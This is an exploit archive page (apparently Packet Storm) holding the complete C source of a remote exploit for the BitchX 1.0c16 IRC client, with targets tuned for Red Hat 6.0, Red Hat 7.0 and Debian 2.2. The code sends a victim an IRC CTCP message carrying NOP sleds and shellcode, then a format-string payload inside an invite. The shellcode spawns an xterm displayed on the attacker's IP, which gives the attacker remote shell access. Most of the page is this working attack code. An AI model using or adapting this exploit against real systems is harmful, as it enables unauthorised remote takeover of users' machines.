what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xp-bitchx.c

xp-bitchx.c
Posted Dec 3, 2000
Authored by RaiSe | Site netsearch-ezine.com

BitchX v1.0c16 remote exploit. Tested against Redhat 6.0, 7.0, and Debian 2.2.

tags | exploit, remote
systems | linux, redhat, debian
SHA-256 | f60db0f8af808e077c41cddcfbc5286c210560d141961d680824e2410e37b026

xp-bitchx.c

Change Mirror Download
/*
* BitchX Xploit by RaiSe
* Tested with version 1.0c16(+) in: redhat 6.0 (2.2.16)
* redhat 7.0 (2.2.16)
* debian 2.2 (2.2.16)
*
* NetSearch Ezine Staff
* http://www.netsearch-ezine.com
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 6667

int soc_local,snick;
struct sockaddr_in addr_local;
struct hostent *server;
char buf[1024], cmd[512], formatbuf[1024], ip[64], *p;

int irc(char *n,char *s,char *sc);
int format(int v);

static char shellcode[256] = // by RaiSe
"\xeb\x5b\x5e\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xc3\x75\x47\x31"
"\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b\x31\xc9\xb1\x09"
"\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88\x34\x32\x31\xd2"
"\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d\x7e\x19\x89\x7e"
"\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e\x36\x8d\x56\x46"
"\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xa0\xff"
"\xff\xff/usr/X11R6/bin/xterm8-ut8-display8";

char nops4[] = "\x90\x90\x90\x90";


// main()
int main(int argc, char *argv[])
{

if (argc!=5)
{
printf("\nBitchX Xploit by RaiSe\n");
printf("http://www.netsearch-ezine.com\n");
printf("\nuse: %s nick irc-server my-ip dist\n",argv[0]);
printf("\ndist = 1 --> redhat 6.0\n"
"dist = 2 --> redhat 7.0\n"
"dist = 3 --> debian 2.2\n\n");
exit(0);
}

sprintf(ip,"%s:0K",argv[3]);
strcat(shellcode,ip);

printf("\nBitchX Xploit by RaiSe\n");
printf("http://www.netsearch-ezine.com\n");
puts("\ndoing it..");

snick=strlen(argv[1]);
format(atoi(argv[4]));
irc (argv[1],argv[2],formatbuf);
printf("finished\n\n");

return(0);

} // end main()

// irc()
int irc(char *n,char *s,char *sc)
{

if ((server = gethostbyname(s)) == 0)
{
printf("error al resolver el host\n");
exit(0);
}

if ((soc_local=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("error al crear el socket\n");
exit(0);
}

bzero((char *) &addr_local, sizeof(addr_local));

addr_local.sin_family = AF_INET;
addr_local.sin_port = htons(PORT);
memcpy(&addr_local.sin_addr, server->h_addr, server->h_length);

if ((connect(soc_local,(struct sockaddr *) &addr_local,sizeof(addr_local)))
== -1)
{
printf("error al conectar con el servidor\n");
exit(0);
}

p=buf;

// user
sprintf(cmd,"user k k k k\n");
write(soc_local,cmd,strlen(cmd));

// nick
sprintf(cmd,"nick rxkfe\n");
write(soc_local,cmd,strlen(cmd));

// pong
while(1)
{
read(soc_local,p,1);
if ((*p=='\n') && (strstr(buf,"PING :")))
{
p = (strstr(buf,"PING :")) + strlen("PING :");
sprintf(cmd,"PONG %s",p);
write(soc_local,cmd,strlen(cmd));
break;
}
if (*p=='\n')
p=buf;
p++;
}

// ctcp
sprintf(cmd,"privmsg %s :\x01%s%s%s%s%s%s\x01\n"
,n,nops4,nops4,nops4,nops4,nops4,shellcode);

write(soc_local,cmd,strlen(cmd));

sleep(2);

// invite
sprintf(cmd,"invite %s #%s\n",n,sc);
write(soc_local,cmd,strlen(cmd));

sleep(2);
return(0);

} // end irc()

// format()
int format(int v)
{

if ((v!=1) && (v!=2) && (v!=3))
{
printf("\ndist = 1 --> redhat 6.0\n"
"dist = 2 --> redhat 7.0\n"
"dist = 3 --> debian 2.2\n\n");
printf("exiting..\n\n");
exit(0);
}


if (v==1)
{
int n, nr, a1, nx, nn = 0x150;
char dire[4][8] = { "\x60","\x61","\x62","\x63" };
int a2 = 0x1b5 - 0xdb;
int a3 = 0xff - 0xb5;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
sprintf(nops,"\x90%s",nops4);
nx = 126;
nr = 0x6;
break;
case 2:
sprintf(nops,"%s",nops4);
nx = 126;
nr = 0x5;
break;
case 3:
sprintf(nops,"\x90\x90\x90");
nx = 126;
nr = 0x4;
break;
case 4:
sprintf(nops,"\x90\x90");
nx = 126;
nr = 0x3;
break;
case 5:
sprintf(nops,"\x90");
nx = 126;
nr = 0x2;
break;
case 6:
sprintf(nops,"%s",nops4);
nx = 129;
nr = 0x5;
nn = 0x158;
break;
case 7:
sprintf(nops,"\x90\x90\x90");
nx = 129;
nr = 0x4;
nn = 0x158;
break;
case 8:
sprintf(nops,"\x90\x90");
nx = 129;
nr = 0x3;
nn = 0x158;
break;
case 9:
sprintf(nops,"\x90");
nx = 129;
nr = 0x2;
nn = 0x158;
}

a1 = 0x10db - nn - 0x10 - 0xc - nr;

for (n = 0; n < nx ; n += 3)
strcpy(&xx[n], "%8x");

sprintf(formatbuf,
"%s"
"%s\xea\xff\xbf"
"%s"
"%s\xea\xff\xbf"
"%s"
"%s\xea\xff\xbf"
"%s"
"%s\xea\xff\xbf"
"%s"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
,nops,dire[0],nops4,dire[1],nops4,dire[2],
nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==2)
{
int n, nr, a1, nx, nn = 0x138;
char dire[4][8] = { "\xbc","\xbd","\xbe","\xbf" };
int a2 = 0x1b2 - 0xc1;
int a3 = 0xff - 0xb2;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
sprintf(nops,"\x90%s",nops4);
nx = 117;
nr = 0x6;
strcpy(dire[0],"\xbc");
strcpy(dire[1],"\xbd");
strcpy(dire[2],"\xbe");
strcpy(dire[3],"\xbf");
break;
case 2:
sprintf(nops,"%s",nops4);
nx = 117;
nr = 0x5;
strcpy(dire[0],"\xbc");
strcpy(dire[1],"\xbd");
strcpy(dire[2],"\xbe");
strcpy(dire[3],"\xbf");
break;
case 3:
sprintf(nops,"\x90\x90\x90");
nx = 117;
nr = 0x4;
strcpy(dire[0],"\xbc");
strcpy(dire[1],"\xbd");
strcpy(dire[2],"\xbe");
strcpy(dire[3],"\xbf");
break;
case 4:
sprintf(nops,"\x90\x90");
nx = 117;
nr = 0x3;
strcpy(dire[0],"\xbc");
strcpy(dire[1],"\xbd");
strcpy(dire[2],"\xbe");
strcpy(dire[3],"\xbf");
break;
case 5:
sprintf(nops,"\x90");
nx = 117;
nr = 0x2;
break;
case 6:
sprintf(nops,"%s",nops4);
nx = 120;
nr = 0x5;
nn = 0x140;
break;
case 7:
sprintf(nops,"\x90\x90\x90");
nx = 120;
nr = 0x4;
nn = 0x140;
break;
case 8:
sprintf(nops,"\x90\x90");
nx = 120;
nr = 0x3;
nn = 0x140;
break;
case 9:
sprintf(nops,"\x90");
nx = 120;
nr = 0x2;
nn = 0x140;
}

a1 = 0x10c1 - nn - 0x10 - 0xc - nr;

for (n = 0; n < nx ; n += 3)
strcpy(&xx[n], "%8x");

sprintf(formatbuf,
"%s"
"%s\xe7\xff\xbf"
"%s"
"%s\xe7\xff\xbf"
"%s"
"%s\xe7\xff\xbf"
"%s"
"%s\xe7\xff\xbf"
"%s"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
,nops,dire[0],nops4,dire[1],nops4,dire[2],
nops4,dire[3],xx,a1,a2,a3,a4);
}

if (v==3)
{
int n, nr, a1, nx, nn = 0x180;
char dire[4][8] = { "\x80","\x81","\x82","\x83" };
int a2 = 0x1b3 - 0xa4;
int a3 = 0xff - 0xb3;
int a4 = 0x1bf - 0xff;
char xx[1024], nops[256];

switch(snick)
{
case 1:
sprintf(nops,"\x90%s",nops4);
nx = 144;
nr = 0x6;
break;
case 2:
sprintf(nops,"%s",nops4);
nx = 144;
nr = 0x5;
break;
case 3:
sprintf(nops,"\x90\x90\x90");
nx = 144;
nr = 0x4;
break;
case 4:
sprintf(nops,"\x90\x90");
nx = 144;
nr = 0x3;
break;
case 5:
sprintf(nops,"\x90");
nx = 144;
nr = 0x2;
break;
case 6:
sprintf(nops,"%s",nops4);
nx = 147;
nr = 0x5;
nn = 0x188;
break;
case 7:
sprintf(nops,"\x90\x90\x90");
nx = 147;
nr = 0x4;
nn = 0x188;
break;
case 8:
sprintf(nops,"\x90\x90");
nx = 147;
nr = 0x3;
nn = 0x188;
break;
case 9:
sprintf(nops,"\x90");
nx = 147;
nr = 0x2;
nn = 0x188;
strcpy(dire[0],"\x70");
strcpy(dire[1],"\x71");
strcpy(dire[2],"\x72");
strcpy(dire[3],"\x73");
}

a1 = 0x10a4 - nn - 0x10 - 0xc - nr;

for (n = 0; n < nx ; n += 3)
strcpy(&xx[n], "%8x");

sprintf(formatbuf,
"%s"
"%s\xe8\xff\xbf"
"%s"
"%s\xe8\xff\xbf"
"%s"
"%s\xe8\xff\xbf"
"%s"
"%s\xe8\xff\xbf"
"%s"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
"%%%dx%%n"
,nops,dire[0],nops4,dire[1],nops4,dire[2],
nops4,dire[3],xx,a1,a2,a3,a4);
}

return(0);

} // end format()

// 0x00
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    33 Files
  • 8
    Feb 8th
    34 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close